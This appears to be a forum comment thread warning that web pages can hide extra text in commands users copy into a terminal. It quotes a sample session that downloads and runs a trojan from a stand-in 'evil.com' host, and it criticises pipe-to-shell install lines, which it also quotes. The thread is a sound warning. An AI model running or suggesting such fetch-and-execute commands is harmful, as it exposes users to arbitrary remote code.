It tricks users who blindly cut+paste console commands.

Yet another reason why command line literacy is important, even with "polished" distros. (Particularly if those polished distros have a habit of removing GUI configuration in the name of "simplification", pushing users to forums to find fixes that they can paste into their terminal...)

Even command line literate people can fall victim to copy and paste exploits. If you are copying from a non-trusted website, you might be tempted to read the code that you are copying, decide that it is safe, and copy it. The problem is that with HTML, it is possible that the website could make you copy something in addition to what you actually see, and therefore still be able to execute arbitrary code even though you 'audited' it before hand.

I suspect that most people who can find the console will notice what's going on with a session like this:

    $ wget evil.com/trojan
    $ chmod +x trojan
    $ ./trojan

Maybe it's more likely to hit those who double-click unwisely?

Remember that a year or two ago all of the public instructions for installing nodejs were of the form.

    sudo wget http://example.com/node/install.sh | sh

so it's not like it's only newbies who blindly run scripts as root.

Similar to how Meteor is installed: curl https://install.meteor.com | /bin/sh

After downloading it asks for your password.

Not neccessarily: http://thejh.net/misc/website-terminal-copy-paste